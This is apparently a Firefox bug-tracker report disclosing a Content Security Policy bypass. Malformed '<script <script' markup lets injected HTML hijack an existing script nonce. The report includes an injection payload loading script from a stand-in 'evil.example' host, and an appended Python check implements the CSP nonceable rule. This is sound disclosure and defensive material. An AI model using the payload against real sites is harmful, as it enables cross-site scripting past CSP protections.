CSP bypass due to incorrect attribute parsing
Categories: Core :: DOM: Security, defect
Reporter: squarcina; Assignee: Unassigned
Attachments: 1 file (679 bytes, text/javascript)
We discovered a CSP bypass in Firefox due to a peculiar parsing of HTML attributes compared to other browsers. In Firefox, the HTML code <script <script nonce="abc"> is parsed as a single <script> node with 2 attributes:

    <script=""
    nonce="abc"
This is captured by the (failing) WPT test nonce-enforce-blocked.html.
This behavior enables an attacker with a markup injection on the page to bypass CSP by hijacking the valid nonce of an already existing <script> attribute. For instance, assuming that the CSP of the following page is Content-Security-Policy: script-src 'nonce-abc':
{INJECTION} <script nonce="abc" src="https://good.example/good.js"></script>
An attacker can execute arbitrary JavaScript by injecting <script src="https://evil.example/evil.js", resulting in the following code:

    <script src="https://evil.example/evil.js" <script nonce="abc" src="https://good.example/good.js"></script>
A working demo of the attack can be tested at https://noncehijacking.minimal.blue/?foo=injection and triggered with the following payload:
The full NodeJS code of the PoC is attached to this vulnerability report.
Could you please CC Pedro Bernardo (user id 722366) to this report since we discovered the issue together?
Best regards
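As an added example (not part of this report or its attached PoC), the check that CSP Level 3 specifies for exactly this situation, applied to the markup above: the "is element nonceable" algorithm refuses a script element's nonce when any attribute name or value contains "<script" or "<style", or when an attribute name is duplicated. Python's html.parser is used here as a stand-in for the browser tokenizer (an assumption, but it produces the same attribute named <script that the report describes), so the injected tag is rejected even though it carries the valid nonce while the original tag is accepted.

```python
from html.parser import HTMLParser

# Markup taken from the report: the injected "<script src=..." prefix
# in front of the legitimately nonced script, and the benign original.
INJECTED = ('<script src="https://evil.example/evil.js" '
            '<script nonce="abc" src="https://good.example/good.js"></script>')
BENIGN = '<script nonce="abc" src="https://good.example/good.js"></script>'


class ScriptCollector(HTMLParser):
    """Collects the (name, value) attribute list of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(attrs)  # duplicates are kept, in source order


def parse_scripts(markup):
    parser = ScriptCollector()
    parser.feed(markup)
    parser.close()
    return parser.scripts


def is_nonceable(attrs):
    """CSP Level 3 'is element nonceable' for a script element.

    Not Nonceable (False) when there is no nonce attribute, when any attribute
    name or value contains '<script' or '<style' (ASCII case-insensitive), or
    when an attribute name is duplicated (a duplicate-attribute parse error).
    """
    names = [name for name, _ in attrs]
    if "nonce" not in names:
        return False
    for name, value in attrs:
        for text in (name, value or ""):
            lowered = text.lower()
            if "<script" in lowered or "<style" in lowered:
                return False
    return len(names) == len(set(names))


def nonce_accepted(markup, policy_nonce="abc"):
    """Would the single <script> in `markup` run under script-src 'nonce-abc'?"""
    (attrs,) = parse_scripts(markup)
    nonce = dict(attrs).get("nonce")
    return is_nonceable(attrs) and nonce == policy_nonce
```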